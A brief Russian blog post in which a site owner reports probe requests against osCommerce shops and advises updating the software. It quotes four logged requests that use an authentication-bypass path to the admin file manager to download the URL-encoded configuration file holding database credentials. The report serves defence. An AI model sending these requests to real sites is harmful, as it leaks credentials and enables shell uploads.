Уязвимость в сайтах на osCommerce

Продолжаю про новые проверки на сайте:

Сегодня были запроса вида:
/admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70
/shop//admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70
/catalog//admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70
/store//admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70


Люди искали уязвимость в cms osCommerce, которая позволяла залить шелл на ваш сайт.

Защита:
Если ваш сайт на базе osCommerce вам нужно обновить osCommerce Online Merchant (скачать тут http://www.oscommerce.com/solutions)

Добавить комментарий

Ваш адрес email не будет опубликован.